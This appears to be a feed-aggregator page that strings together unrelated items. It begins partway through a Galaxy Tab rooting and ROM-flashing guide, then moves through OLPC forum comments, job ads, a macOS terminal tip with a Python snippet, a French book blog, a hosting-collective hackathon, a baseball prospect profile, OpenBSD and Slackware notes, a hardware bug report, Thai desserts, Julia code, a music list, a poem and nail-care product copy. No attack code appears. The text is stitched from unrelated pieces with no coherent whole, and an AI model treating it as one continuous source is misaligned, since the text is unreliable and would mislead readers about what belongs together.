20. I navigated to the forum thread on RootzWiki, [Cdma] [Vzwtab] Cm7 Beta-Kang [Unofficial] 11/01, and grabbed the recovery tool, ClockWorkMod 5.0.2.7. [Copyright notice: this link is from my FTP site, but all copyrights and ownership belong to the original author of the ClockWorkMod tool. Since the original download link no longer exists, I have placed a copy of the file on my FTP for convenience.]
21. Before proceeding any further, it is very important that you have all the files mentioned below on your Galaxy Tab's SD card. Do so if you don't want to repeat all the steps above again.
22. I grabbed the CM-7.1 ROM from the above forum as well. Then I navigated to this forum to fetch the AOSP ICS / CM9 for CDMA Build 3 ROM and the corresponding Google apps. [Upgrading to any AOSP ICS build is at the discretion of the end user. I recommend reading the cautionary notes in the original post; I'm not responsible for burned boards. Also, in later builds (e.g. Build 5 onward) the file system changes again, so I recommend first upgrading to Build 3 and then to Build 7.]

Connect your Tab to the PC, mount the SD card, and copy the downloaded files to it. [Do not extract the zip files; copy them as-is.]

23. Flash CWM 5.0.2.7: Open heimdall-frontend again and place your Galaxy Tab in download mode as explained in step 11. In Heimdall, place the files in the correct slots. [It is very important that you do this step correctly if you value your Galaxy Tab.]
Kernel (zImage) = zImage [from the unzipped CWM 5.0.2.7 tar file]
Recovery = recovery.bin [from the unzipped CWM 5.0.2.7 tar file]

24. The Galaxy Tab will reboot; put it in recovery mode as explained in step 16. Now, unlike the earlier "Android System Recovery", you will see the "ClockWorkMod" recovery manager, which has more options. If you don't see it, something is wrong; let me know and I will see whether some step has been missed. Either way, on reboot you should still have a rooted Gingerbread.

25. Update to CM7.1: In recovery mode (Volume Up/Down to navigate, "Power" as the Enter key), navigate to "mounts and storage" and format only "/system", "/data" and "/cache". Hit "Go Back", then "Wipe data/factory reset" and "Wipe cache partition".

26. Select "Install zip from sdcard" and choose the CM-7.1 ROM zip. It is very important that you install this ROM first, because its installation converts your partitions from RFS to EXT4 automatically.

27. Reboot and enjoy a fully working CM7.1 Gingerbread ROM. You can stop here if you wish, or proceed further to ICS; from my personal usage, this is a very stable ROM.

28. Reboot into recovery and repeat steps 25 through 27, but in "install zip from sdcard" select your ICS ROM instead of the CM7.1 ROM. Reboot and enjoy ICS.

29. Installing Google apps: Neither this ROM nor the step 25 ROM comes with Google apps pre-installed, meaning you have to install them separately.

30. Reboot into recovery mode and, under "mounts and storage", select "Mount /system". It is very important that you DO NOT format or wipe any folder or partition. Select "gapps-final.zip" from the SD card and install it via "install zip from sdcard".

31. Reboot and enjoy ICS.
What it will look like after all the steps:


          RE[4]: How ridiculous   
Sugar has a feature built right into the interface that opens the source code for any application. That's got to be the most transparent user interface ever devised, trumping "view source" in the web browser. How does Sugar "keep Linux hidden"? By not being KDE or GNOME? Come on, you'll have to do better than that on this site... In any case, the OLPC objective is more about free software than Linux in particular. So if it emphasizes to these kids the importance of choosing free software in general rather than merely choosing a free software kernel, then they're doing the right thing. Linux is often the most suitable kernel for any given free software product, but it's not enough to have the growing and youthful middle classes in developing nations worshiping Linux as the key to achieving independence from the multinational vendors. The whole stack must be free, end-to-end, in order for these people, their businesses, and their governments to bring themselves into the digital cloud age while retaining their cultural identities and regaining their economic independence. The kernel probably isn't the package that will see the most development from the XO community in the short-term. The work is likely to focus on Sugar, the core applications, and other user-visible components. So it's important that Sugar is clean and hackable. Although KDE, especially KDE4, is pretty hackable for those who grok C++, it has more of a learning curve. It's not clear how useful it would be on a machine with such meager hardware and screen real estate. This is some delusional Western imperialist mindset. Who gave anybody the right to go and define what it means to be a "pro" at doing stuff with computers? Give these people, especially the kids, some time with open hardware and open software, and they will surely develop amazing skills and functionality. 
These people deserve better than figurative "Windows" into the conventional wisdom that locks them into the indentured servitude of global capitalism. They deserve an equal playing field that offers limitless possibilities for innovation and empowerment. KDE and GNOME have a lot of our Windows-tainted conventional wisdom and cultural DNA already baked in. They already have their visions more or less in focus within their development communities. I think it's better for everyone to give fresh minds a fresh whack at a relatively clean slate. They will show us that "pro" comes in all shapes, sizes, colors, and income levels. Let us have a little more faith in humanity, and let those of us living in relative comfort resolve for the coming new year to consider the economic, cultural, and spiritual value of bringing hope and opportunity to the lives of the world's vast underclasses.
          RE: swine   
Quite frankly, you're full of sh**e. Windows is just a kernel, just as Linux is just a kernel. Microsoft can and does have minimal configurations.
          RE[5]: How ridiculous   
Quite apart from the other inaccuracies in this post that have already been addressed, we have: how are foreign kids going to benefit from being able to look at obfuscated, ill-documented C code with comments, variable names, method names, class names, and library names written in English? And not even full English sentences, mind you, but a horribly contracted version (HorCntrVers) that's barely readable even to a native English speaker? The OLPC's Sugar environment, unlike the Linux kernel, is not written in C but in Python, an excellent language for learning programming. As for the use of English: you have to learn some English to program anyway, as virtually all programming languages, including those developed by non-native English speakers, use English. Learning English is educational too.
          apps-extra/rsyslog-8.28.0-1-x86_64   
Enhanced system logging and kernel message trapping daemon
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT - View all San Jose, CA jobs
          Control+T in Terminal shows time snapshot   
Not sure if this was available before 10.7, but hitting Control+T while a command is running in Terminal will show which process is executing, the load average, the PID of the process, and its user and kernel time.

I was running a script and accidentally hit Control+T instead of Command+T to create a new tab. I was surprised at what I got. Here is an example of what gets printed:
# buildOrder.py
load: 2.51  cmd: p4 15179 running 0.00u 0.00s
load: 2.23  cmd: p4 17962 waiting 0.01u 0.00s
load: 2.53  cmd: Python 15167 running 94.68u 66.33s
load: 2.60  cmd: Python 15167 running 150.71u 101.82s

[crarko adds: I wasn't able to reproduce this, but it may be due to the briefness of the running command. Give it a try and post a comment about your results. Try it in Snow Leopard too if you ...
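Under the hood, Control+T makes the terminal send SIGINFO to the foreground process, and a program can install its own handler to print a custom status line. A minimal Python sketch of that idea; note that `signal.SIGINFO` only exists on BSD-derived systems such as macOS, so the SIGUSR1 fallback below is my assumption for portability, not something Terminal does:

```python
import os
import signal
import time

# Ctrl+T in a BSD/macOS terminal delivers SIGINFO to the foreground job.
# signal.SIGINFO exists only on BSD-derived systems; fall back to SIGUSR1
# so this sketch also runs on Linux (the fallback is a demo assumption).
SIG = getattr(signal, "SIGINFO", signal.SIGUSR1)

reports = []

def on_info(signum, frame):
    # A real program would print progress here, like the load/PID line
    # that Terminal shows by default.
    reports.append("status: still working")

signal.signal(SIG, on_info)

# Simulate the user hitting Ctrl+T by signalling ourselves.
os.kill(os.getpid(), SIG)
time.sleep(0.1)  # give the interpreter a moment to run the handler
```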
          The Mois anglais, season 6: let's get started!   

Today the Mois anglais begins and, having no review ready, I thought it was a good opportunity to share a few photos and sources of inspiration for this new month.

PAL01.jpg

A small part of my to-be-read pile (there is a row behind this one that I haven't had a chance to photograph yet). It includes a few gifts and some recent acquisitions from my last two trips to England. Looking at the photo again, I realize I have even more titles to read this month and that, clearly, I will only discover the smallest visible part of the iceberg! Cryssilda, you will notice the titles Necropolis and Bedlam (you'll recognize me there!).

cambridge2017_01.jpg

Photo: Copyright MyLouBook

In 2017 there should be some greenery around here... the beautiful countryside and villages of the Cotswolds, as well as the pretty parks of Cambridge.

cambridge2017_03.jpg

Photo: Copyright MyLouBook

Tea, and tea times!

cambridge2017_04.jpg

Photo: Copyright MyLouBook

And plenty of other English delights and places!

In fact, this year, what if I shared a few English objects I have at home? Kitsch and less kitsch, often literary and sometimes royal, English objects have invaded my home without my noticing.

******

As for meet-ups and shared readings, I will see what I manage to do. Here, in any case, are the readings I am sure to take part in (in pink) and those I am considering (in blue).

 

I will probably also take part in a food-themed day by sharing some photos from my latest trips.

I would have liked to join the June 1st read-along too, but I realized how impossible that was when I discovered the page count and the font size of my copy a few days ago... I would also like to read Angela Huth and Daphne Du Maurier, but I am trying to stay at least somewhat credible (ahem...).

With that, after this first post, which is obviously largely improvised and written after an intense day, all that remains is to wish you once again an EXCELLENT MOIS ANGLAIS!

mois anglais saison6.jpg

 


          April news: April's chaton on the starting line   

On June 2 and 3, a hackathon took place at the Auberge Espagnole in Mons-en-Barœul, near Lille, to set up the base infrastructure of April's chaton (kitten). For those two days, April's system administrators worked flat out to get the kitten out of the box. By the end of the weekend, five virtual machines were already purring on maine and coon, the two physical servers that host them. It is on these machines that the various infrastructure services were cooked up: (screenshot of the virtual machine manager)

  • replicated volumes with DRBD,
  • virtual machines with KVM/Libvirt,
  • domain names with Bind,
  • email with Postfix,
  • backups with Borg,
  • web with NginX,
  • documentation with Dokuwiki,
all washed down with a Debian Stretch sauce and spiced with a great deal of network configuration.

By the end of the weekend there was still work left, but the foundations of the architecture were in place. Since then, the sysadmins have kept up the effort and have installed:

  • monitoring with Icinga2,
  • the firewall with Firehol,
  • discussion lists with Sympa,
  • a Mastodon instance.
(a little kitten coming out of its box) April's chaton is thus very close today to being able to start offering services to the public. So if the adventure interests you, don't hesitate to join the team! All goodwill is welcome: we need webmasters, moderators, graphic designers, documentation writers, developers, administrators, and so on.
We also have a mailing list dedicated to this project: chaton@april.org. You can subscribe to it via Sympa's web interface.
An IRC channel is also available: #april-chatons on irc.freenode.net.

April sends a big bravo to everyone who actively took part in setting up the infrastructure: François, Edouard, Quentin, Vincent-Xavier.

Many thanks as well to the Auberge Espagnole, and to our friends at ClissXXI for hosting us.

Finally, a big thank-you to all the developers of the many free software projects that make this adventure possible.

About the CHATONS project

Not long ago, April welcomed the birth of the Collectif des Hébergeurs Alternatifs, Transparents, Ouverts, Neutres et Solidaires (CHATONS), the collective of alternative, transparent, open, neutral and solidarity-based hosting providers.

April already offers its members various free and loyal online services. It wants to go further, however, by offering some services to everyone. That is why April is taking part in CHATONS. It is time for April's kitten to come out of its box.

Kitten image: "By 0x010C (Own work) [CC BY-SA 4.0 (http://creativecommons.org/licenses/by-sa/4.0)], via Wikimedia Commons"


          Get To Know: Felix Jorge   
Photo Credit: Seth Stohs, Twins Daily
Felix Jorge will be making his big league debut on Saturday, but his name probably isn't familiar to a lot of fans. The 23-year-old right-handed pitcher has been in the Twins organization since 2011, when he signed out of the Dominican Republic. I recently named him the ninth-best prospect in the Twins organization. As with any pitching prospect, there have been some ups and downs during the professional tenure of Mr. Jorge.

Before he makes his big league debut, here's your opportunity to get to know Felix Jorge.

Rookie Leagues
Jorge made his professional debut as a 17-year-old in the Dominican Summer League. In nine appearances (five starts), he allowed eight earned runs (2.67 ERA) with 26 strikeouts and nine walks. He'd come stateside in 2012 and pitch for the GCL Twins. Across 34.2 innings, he allowed nine earned runs while improving his SO/9 from 8.7 to 9.6. He moved up the ladder again in 2013 as he headed to Elizabethton, where he combined for a 2-2 record with a 2.95 ERA. Jorge was establishing himself as one of the Twins' top pitching prospects.

2014 Struggles
The Twins organization continued to be aggressive with Jorge to start the 2014 campaign. He was sent to Cedar Rapids to start the season and he struggled for the first time in his professional career. Jorge was knocked around for 39 runs in 39 innings including nine home runs. The Kernels tried to move him to the bullpen to find some success but even that plan didn't work. By the end of May, he was sent back to extended spring training with plenty of question marks surrounding his future.

Bouncing Back
It would be an understatement to say Jorge bounced back strongly from his early season struggles. Jorge finally had something click when he returned to Elizabethton for the second-half of the 2014 campaign. He would be named the Appalachian League Pitcher of the Year as he went 4-2 with a 2.59 ERA and a 1.09 WHIP. He posted a 61 to 14 strikeout to walk ratio over 66 innings. From this point forward, Jorge would become the most consistent starting pitcher in the Twins organization.

During the 2015 campaign, Jorge would spend the entire season at Cedar Rapids, the site of his biggest professional failure. While being almost a year younger than the competition, he posted a 2.79 ERA and a 1.06 WHIP. He posted career highs in innings pitched (142), strikeouts (114), wins (6), and starts (22).

Upper Minors
The 2016 season saw him take the next step as he split time between High-A and Double-A. Through his first seven starts, he posted a 2.00 ERA with 38 strikeouts in 45.0 IP. From May 26-July 5, he reeled off seven straight victories while averaging over six innings per start. During this stretch, he had a 1.13 ERA and held opponents to a .549 OPS. His impressive stretch meant he was named the starter for the FSL South Division All-Stars. His first six starts at Double-A saw him post an ERA north of 5.00. From there, he settled in with a 3.16 ERA while averaging more than seven innings per start in his last five appearances.

Jorge was added to the 40-man roster leading into the 2017 season. This is one of the reasons he will be making a start on Saturday as the Twins needed someone to make a spot start. However, he has been doing well in his second stint at Double-A. Through 14 starts, he has a 3.26 ERA and a 61 to 22 strikeout to walk ratio. His eight wins are the second most in the entire Southern League.

Scouting Report
The Twins list Jorge at 6-foot-2 and 170 pounds, so he doesn't exactly look overpowering on the mound. He can hit the low 90s with his fastball, which can surprise some hitters because of his size. He doesn't strike out a lot of batters, but he always stays around the zone. Jorge prefers to pitch in the lower half of the zone so he can coax ground balls from batters. He also uses a changeup and a late-breaking slider to get more ground-ball outs. Overall, the hope is that he can develop into a mid-rotation starter who can help the Twins as they fight their way back into contention.
          2 Slackware Updates   
The following updates have been released for Slackware Linux: glibc (SSA:2017-181-01) and kernel (SSA:2017-181-02).
          d2k17 hackathon report: Martin Pieuchot on moving the network stack out of the big lock   
Our next report from the d2k17 hackathon comes from Martin Pieuchot, who writes:

Hackathons are generally good for starting or finishing something; at Starnberg I managed to do both.
I came to unlock the forwarding path, and thanks to multiple reviews from bluhm@, sashan@ and claudio@, it happened! It started as a boring hackathon because I had to review and fix all the abuses of splnet() in pseudo drivers, but then it went very smoothly. I still haven't seen a bug report about the unlock, and Hrvoje Popovski even reported a 20% forwarding performance increase.

Then I started discussing and planning the next big step with claudio@ and bluhm@: how to unlock the socket layer? Well, it's happening! During the hackathon Claudio sent some diffs to start unlocking the pfkey and routing sockets, and since then I have started working on the TCP receive side.

In the meantime I had to commit my futex(2)-based mutex and condition variable implementations for our libpthread. This improves the performance of threaded applications a lot, which means most of ports benefit.

I also did some cleanups to help towards having MI mutex and kernel lock implementations. This should allow all our archs to benefit from the lock instrumentations visa@ and jmatthew@ are working on.

Finally I committed some ddb(4) cleanups, mostly CTF related.

Thanks to mpf@ and genua for organizing this hackathon!

Thanks for the report, Martin!

It is worth noting that most, if not all, of the code mentioned here is already doing good work in recent snapshots.


          intel NUC6CAYH no audio out via HDMI in Linux   

Affected : intel NUC6CAYH

 

Expected behavior :

HDMI audio output to Television HDMI 2.0

 

Observed behavior :

Windows 10 : No HDMI audio output at any resolution.

Xubuntu 17.04 (Kernel 4.10x) : No HDMI audio at any resolution.

Librelec 8.02 : No HDMI audio at any resolution.

 

Actions :

Updated BIOS to latest AYAPLCEL.86A.0038 (http://intel.ly/2t4MscK)

Updated MegaChips HDMI firmware to 1.66 via Windows-only software (http://intel.ly/2tI9kwH)

 

Repeat test observed behavior:

Windows 10 : HDMI audio output as expected at all resolutions.

Xubuntu 17.04 (Kernel 4.10x) : No HDMI audio at any resolution.

LibreELEC 8.02 : No HDMI audio at any resolution.

 

Reference:

MCDP28x0 DisplayPort1.2a-to-HDMI 2.0 Converter

http://www.megachips.com/products/displayport/MCDP28x0

 

Filed a bug at Linux DRI; was informed 'it works for everybody'.

Clearly it doesn't...

 

Suggestions?


          DESSERTS AND SWEET SNACKS   

Desserts and sweet snacks
Most Thai meals finish with fresh fruit but sometimes a sweet snack will be served as a dessert.


Chaokuai

Chaokuai - grass jelly is often served with only shaved ice and brown sugar.
Chaokuai can be eaten in many ways to enhance its taste and make it more delicious; how you choose to have this dessert is entirely up to you.


Khanom bua loi


Khanom bua loi – taro root mixed with flour into balls in coconut milk
This traditional dish is often prepared and eaten during festivals and special occasions, served buffet-style with other desserts after the main course. You can add sweet corn kernels and savor it just as some Thais love eating it. Traditionally, in Thailand khanom bua loi is served topped with an egg poached in syrup.


Khanom chan


Khanom chan – multi-layers of pandan-flavored sticky rice flour mixed with coconut milk.
Khanom chan is a delicious product of Thai cuisine. A well-made khanom chan is sweet, which has made it a favorite of even the most discerning palates. Khanom chan has become one of the most popular Thai desserts around the world.


Khanom mo kaeng


Khanom mo kaeng - a sweet baked pudding containing coconut milk, eggs, palm sugar and flour, sprinkled with sweet fried onions.
Kha-nom Mo Gaeng is one of our famous Thai desserts. Maybe you wonder why Thai people choose palm sugar for all kinds of food, especially when we cook Thai desserts. Palm sugar has a nice color and aroma, and of course its unique taste, along with plenty of calories.
No wonder I am getting fat!




Khanom tan




Khanom tan – palm flavored mini cake with shredded coconut on top.
The fruit of the toddy palm can also be eaten and is rich in vitamins A and C. It can be eaten young, when it is soft, juicy and somewhat like lychee but milder and without a pit, or old, when it is harder and less juicy. It is this toddy palm pulp that these cakes are made from, along with rice flour, yeast, palm sugar, coconut cream and coconut milk. Toddy palm cakes are a bit like sponge cake: lightly sweet, with a flavor quite unlike regular sugar.

Khanom thuai talai - steamed sweet coconut jelly and cream.
Khanom thuai talai is prepared by steaming and is generally served as a dessert. It is well liked by those who love sweet food.


Khao niao mamuang




Khao niao mamuang - sticky rice cooked in sweetened thick coconut milk, served with slices of ripe mango.
This luscious dessert is a form of rice pudding that is paired with mangos at the peak of their ripeness. Sweet and rich, khao niao mamuang is a favorite way to finish any Thai meal.


Lot chong nam kathi


Lot chong nam kathi – pandan flavored rice flour noodles in coconut milk, similar to the Indonesian cendol.
Popularly known as a Thai dessert, lot chong nam kathi is enjoyed in many different cuisines across the world. It is an item of choice for those who prefer sweet foods.


Ruam mit 


Ruam mit – mixed ingredients, such as chestnuts covered in flour, jackfruit, lotus root, tapioca, and lot chong, in coconut milk.
Ruam mit in local parlance means ‘social cohesion of diverse elements’, and true to its name, this exclusive Thai dessert upholds that meaning in every possible way.
Before we get to how to eat ruam mit, let's explore the ingredients that make up this sweet Thai delicacy.
Ruam mit mainly comprises jackfruit (a fruit of the mulberry family), flour-coated chestnuts, lotus root, tapioca and lot chong (pandan-flavored rice noodles) in a bath of coconut milk, with the aroma of jasmine.


Sarim
Sarim – multi-colored mung bean flour noodles in sweetened coconut milk served with crushed ice.
Sangkhaya fak thong


Sangkhaya fak thong - egg and coconut custard served with pumpkin, similar to the coconut jam of Malaysia, Indonesia and the Philippines
A Thai pumpkin custard. If you cook this for dessert, perhaps after dinner, your weight will climb higher and higher. I rarely eat it because it is very rich, but the curd of the custard is fantastic, so I suggest you have it once a month. It's worth eating more than it's worth worrying about your weight.


Tako


Tako - jasmine scented coconut pudding set in cups of fragrant pandanus leaf.
The Thai pudding tako comes with a delicious topping of creamy coconut. And the best thing about this delicious pudding is that it's so smooth you don't even have to exercise your teeth much to chew it. The scent of the coconut garnished on top makes the dessert all the more appetizing.
          Comment on Maximum Product Of Three, Revisited by Zack   
Implementation in Julia. No assumption whatsoever, plus no dependencies (as usual). Kernel version: 0.4.5

function main{T <: Integer}(x::Array{T, 1})
    nx = length(x)
    if nx < 3
        println("Array is too short! Please provide at least 3 integers.")
        return NaN
    elseif nx == 3
        return prod(x)
    else
        ind = (x .!= 0)            # indexes of the non-zero elements
        nz = sum(ind)              # how many non-zeros there are
        z = x[ind]                 # get rid of all the 0s
        n = length(z)
        if n < 3; return 0; end    # fewer than 3 non-zeros: every triple includes a 0
        M = typemin(eltype(z))     # start somewhere super low
        for i = 1:(n-2)
            for j = (i+1):(n-1)
                for k = (j+1):n
                    M = max(M, z[i]*z[j]*z[k])
                end
            end
        end
        if (M < 0) && (nz < nx)    # best non-zero product is negative but a 0 is available
            return 0
        else
            return M
        end
    end
end
          Software Development Engineer (Kernel Graphics Driver macOS) - Advanced Micro Devices, Inc. - Markham, ON   
What you do at AMD changes everything At AMD, we push the boundaries of what is possible. We believe in changing the world for the better by driving
From Advanced Micro Devices, Inc. - Mon, 26 Jun 2017 19:57:34 GMT - View all Markham, ON jobs
          Comment on Year-End Lists 2015 by JW   
In case anyone missed my list on FB (yes Wim, that means you): 01. The White Birch - The Weight Of Spring (Glitterhouse) 02. Anoice - Into The Shadows (Ricco) 03. Kloster - Half Dream, Half Epiphany (Burnt Toast Vinyl) 04. Sam Lee & Friends - The Fade In Time (The Nest Collective) 05. Ibeyi - Ibeyi (XL Recordings) 06. Yellow6 - No Memories, Only Photographs (Silber) 07. Norn - Usotsuki (Moving Furniture) 08. The Revolutionary Army Of The Infant Jesus - Beauty Will Save The World (Occultation) 09. Mahsa Vahdat - Traces Of An Old Vineyard (Kirkelig Kulturverksted) 10. Watine - Atalaye (Catgang) 11. Esmerine - Lost Voices (Constellation) 12. Oiseaux-Tempête - ÜTOPIYA? (Sub Rosa) 13. Corpo-Mente - Corpo-Mente (Blood Music) 14. Chloe Charles - With Blindfolds On (Make My Day) 15. Peter Kernel - Thrill Addict (On The Camper) 16. Downriver Dead Men Go - Tides (Downriver Dead Men Go) 17. Last Harbour - Caul (Gizeh) 18. Natural Snow Buildings - Terror’s Horns (Ba Da Bing!) 19. Bersarin Quartett - III (Denovali) 20. 
Manyfingers - The Spectacular Nowhere (Ici D’Ailleurs) Here with descriptions (and sound): http://subjectivisten.nl/?p=4482 The remaining 130, from number 21 onward (out of 575 new releases in total....so not just a random selection): Chantal Acda - The Sparkle In Our Flaws (Glitterhouse) Amber Asylum - Sin Eater (Prophecy) Ílkay Akkaya - Hayat (Ütopya) Anari - Zure Aurrekari Penalak (Bidehuts) Ólafur Arnalds - Broadchurch (Mercury Classics) Ólafur Arnalds & Alice Sara Ott - The Chopin Project (Mercury Classics) Astrïd - The West Lighthouse Is Not So Far (MonotypeRec) Aidan Baker - Half Lives (Gizeh) The Balustrade Ensemble - Renewed Billiance (Serein) Michel Banabila / Oene van Geel - Music For Viola And Electronics II (Tapu) Beach House - Depression Cherry (Bella Union) Beach House - Thank Your Lucky Stars (Bella Union) Michael Begg | Human Greed - Hivernant (Omnempathy) Bell Witch - Four Phantoms (Profound Lore) Tullia Benedicta - Anteros (Second Language Music) Biosphere / Deathprod - Stator (Touch) Björk - Vulnicura (Wellhart/ One Litte Indian) Boduf Songs - Stench Of Exist (The Flenser) Heather Woods Broderick - Glider (Western Vinyl) Cannibales & Vahinés - Songs For A Free Body (Cannibales & Vahinés) Anna Caragnano & Donato Dozzy - Sintetizzatrice (Spectrum Spools) Ben Chatwin - The Sleeper Awakes (Village Green) Benjamin Clementine - At Least For Now (Behind) Samantha Crain - Under Branch & Thorn & Tree (Full Time Hobby) Daisy Bell - London (Opa Loka Records) Dead Neanderthals - Endless Voids (Alone) The Declining Winter - Home For Lost Souls (Home Assembly Music) Olivier Depardon - Les Saisons Du Silence (Vicious Circle) Aïsha Devi - Of Matter And Spirit (Houndstooth) Diagrams - Chromatics (Full Time Hobby) Disappears - Irreal (Kranky) Ricardo Donoso - Machine To Machine (Denovali) Aurélie Dorzée & Tom Theuns - L’Art De Voler (Homerecords.be) Draff Krimmy & Continental Fruit - Existenz (Fluttery) Emika - Drei (Emika Records) Eviyan - Nayive (Animal Music) The Eye Of Time - 
Anti (Denovali) Bill Fay - Who Is The Sender? (Dead Oceans) Filiamotsa - Like It Is (Aagoo) Flug 8 - Trans Atlantik (Disko B) Flying Saucer Attack - Instrumentals 2015 (Domino) William Ryan Fritch - Revisionist (Lost Tribe Sound) GABI - Sympathy (Software) Geins't Naït + Petitgand, Laurent - Oublier (Ici D’Ailleurs) Gideon Wolf - Near Dark (cd, Fluid Audio) The Girl Who Cried Wolf - Ruins (The Girl Who Cried Wolf) Godspeed You! Black Emperor - Asunder, Sweet And Other Distress (Constellation) Takaakira “Taka”Goto - Classical Punk And Echoes Under The Beauty (Pelagic) Gratuit - Là (Kythibong/ Ego Twister) Rachel Grimes - The Clearing (Temporary Residence Ltd.) Haarvöl - Indite (Moving Furniture Records) Ha Det Bra - Societea For Two (Geenger/ PDV) Half Way Station - Dodo (Half Way Station) Tigran Hamasyan - Luys I Luso (ECM) The Hare And The Moon - Wood Witch (Reverb Worship) Anna von Hausswolff - The Miraculous (City Slang) Heezen - Abandoned Memory (Feutlab) Holly Herndon - Platform (4ad) Bas van Huizen - Kluwekracht (Moving Furniture) Jenny Hval - Apocalypse, Girl (Sacred Bones) Illuminine - #1 (Zeal) Insect Ark - Portal / Well (Autumnsongs) Angélique Ionatos - Reste La Lumière (Ici D’Ailleurs) Irfan - The Eternal Return (Prikosnovénie) Iskra String Quartet - Iskra (1631 Recordings) Jasmine Guffond - Yellow Bell (Sonic Pieces) Jerusalem In My Heart - If He Dies, If If If If If If If (cd, Constellation) Kammerflimmer Kollektief - Désarroi (Staubgold) Devrim Kavalli - Dal Dala (Kalan) Julia Kent - Asperities (Leaf) Boris Kovač - Times Of Day (ReR Megacorp) Kreng - The Summoner (Miasmah) Księżyc - Rabbit Eclipse (Penultimate Press) Lakker - Tundra (R&S) Adrian Lane - Branches Never Remember (Preserved Sound) Sinnika Langeland - The Half-Finished Heaven (ECM) Lara Leliane - Free (Homerecords.be) Lotte Kestner - Covering Depeche Mode (Saint-Loup) Sara Lov - Some Kind Of Champion (Splinter) Low - Ones And Sixes (Sub Pop) Luno - Close To Silence (Indies Scope) Mansfield 
TYA - Corpo Inferno (Vicious Circle) Bérangère Maximin - Dangerous Objects (Crammed) Microwolf - You Better Go Now (Esc.rec) Le Millipede - Le Millipede (Alien Transistor) Mist - The Loop Of Love (Skipping Records) Mountaineer - 1974 (Off Amsterdam) Mount Eerie - Sauna (7 e.p.) Myrkur - M (Relapse) Nordic Giants - A Séance Of Dark Delusions (Kscope) Olan Mill - Cavade Morlem (Dronarivm) Oneohtrix Point Never - Garden Of Delete (Warp) Other Lives - Rituals (Tbd) Öxxö Xööx - Nämïdäë (Blood Music) Padna - Alku Toinen (Aagoo/REV. Lab) A Place To Bury Stranger - Transfixiation (Dead Oceans) Petrels - Flailing Tomb (Denovali) Point Quiet - Ways And Needs Of A Night Horse (Continental) Michael Price - Entanglement (Erased Tapes) Radůza - Marathon (Radůza Records) Lana Del Rey - Honeymoon (Polydor/Interscope) Max Richter - Sleep/ From Sleep (Deutsche Grammofon) Rimbaud - Rimbaud (Gusstaff) Sannhet - Revisionist (The Flenser) Scalper - The Emporer’s Clothes (cd, Jarring Effects) Second Moon Of Winter - One For Sorrow, Two For Joy (Denovali) Seigmen - Enola (Indie Recordings/ Ikon) Dirk Serries & Rutger Zuydervelt - Buoyant (Consouling Sounds) Nadine Shah - Fast Food (Apollo) Simon Scott - Insomni (cd, Ash International) Siskiyou - Nervous (Constellation) The Slow Show - White Water (Haldern Pop) Snowapple - Illusion (Snowapple/ Debt/ ZIP) Snow Ghosts - A Wrecking (Houndstooth) The Soft Moon - Deeper (Captured Tracks) Sóley - Ask The Deep (Morr Music) Söll - Cävv (esc.rec) Colin Stetson And Sarah Neufeld - Never Were The Way She Was (Constellation) Sufjan Stevens - Carrie & Lowell (Asthmatic Kitty) Subheim - Foray (Denovali) Templo Diez - Constellations (My First Sonny Weissmuller Recordings) Phil Tomsett - Broken Memory Machine (Fluid Audio) Torres - Sprinter (Partisan) The Unthanks - Mount The Air (Rabble Rouser) Vlimmer I & II - (Blackjack Illuminist) James Welburn - Hold (Miasmah) Bill Wells & Aidan Moffat - The Most Important Place In The World (Chemical Underground) 
Wire - Wire (Pink Flag) Chelsea Wolfe - Abyss (Sargent House) Savina Yannatou & Primavera En Salonico - Songs Of Thessaloniki (ECM)
          DECOMPASSION CHAMBER   

Today's post came about from the idea of someone needing assistance to end a relationship. The idea that they could not deal with the guilt of ending it. A play on words of decompression chamber: a decompassion chamber.
The poem was not straightforward. I had to remove a stanza [that I liked] because it confused the narrative.

I need a de-compassion chamber.
Want this guilt excised
before it can bubble up inside my brain
and bend my body back towards herself
who is crying at the end of this telephone line.

On/off – off/on
the light switch of my indecision
makes for a familiar circuit.
We settle for possible second best.
I may leave her yet.
I admire people who can sustain their poetic vision for more than twenty lines, as I rarely can. That said, any poem is only as long as the kernel of the idea will sustain.
Maggie Roche died recently. I was always a fan of The Roches. Especially the first and third albums. Here they are from 1983 singing Hammond Song.
And here they sing Mr. Sellack.
Until next time.

          Consumer Critique: Nail Care from Cutex   
I recently had a chance to try out a variety of products from Cutex.

I was actually shocked, the first time I tried a glitter polish, by how hard it was to get the glitter off. It was crazy! The ultra-powerful remover really does help get it off quickly - much easier than traditional nail polish remover. I also like the fragrances of these polish removers; they're not nearly as strong as some standard removers.

The nail care products didn't make much difference for me, but I don't have a problem with my nails. However, they did help my daughter's (she tends to bite her nails which leads to cracking) and my mom's (she's always had nails that crack easily).


Cutex products provide comprehensive nail care - removers, hand care, nail strengtheners, and more. They even have products for helping remove stubborn colors that make nails sometimes look yellow after the polish has been removed. They're easy to use, a decent value, and can be found at a variety of stores, including mass merchandisers, online, and drug stores. See below for just some of the options available!


·         Nourishing Nail Polish Remover contains a patented oil blend of flaxseed and perilla seed which is proven to condition nails while quickly removing all traces of nail polish. The non-drying formula with a sparkling peach fragrance contains apricot kernel oil to soften skin and vitamin E to neutralize free radicals and moisturize the skin around the nails.
·         Strength-Shield Nail Polish Remover contains vitamin B5 which improves the flexibility and strength of nails. Vitamin E neutralizes free radicals and moisturizes the skin around the nails while hydrolyzed silk proteins provide and retain moisture to help protect skin from dehydration. Lavender flower extract provides a calming scent, but it also has antifungal and antibacterial properties. 
·         Ultra-Powerful Remover contains a patented oil blend of flaxseed and perilla seed which is proven to nourish nails while removing the toughest polishes (including dark color and glitter).  Apricot kernel oil is rich in vitamin E to soften the skin.  A refreshing cucumber fragrance adds to the experience!
·         Swipe & Go Nail Polish Remover Pads provide no-mess polish removal with easy-to-use remover pads – perfect for on-the-go or at home.  The pads contain the Nourishing Nail Polish Remover formula to quickly remove nail color. The textured surface of the pad makes it easier to scrub off stubborn nail color, even gels and glitters!

Problem: Brittle & Peeling Nails
Solution: Cutex Intense Recovery
This all-in-one salon-strength treatment will heal weak nails back to health. Combined with the perfect blend of Sweet Almond Oil, Jojoba Seed Oil & Rice Bran Oil, this formula deeply penetrates the skin and nails to strengthen and moisturize nails.  Apply twice daily to the nail and cuticle.

Problem: Cracked & Splitting Nails
Solution: Cutex BB Nail Concealer 
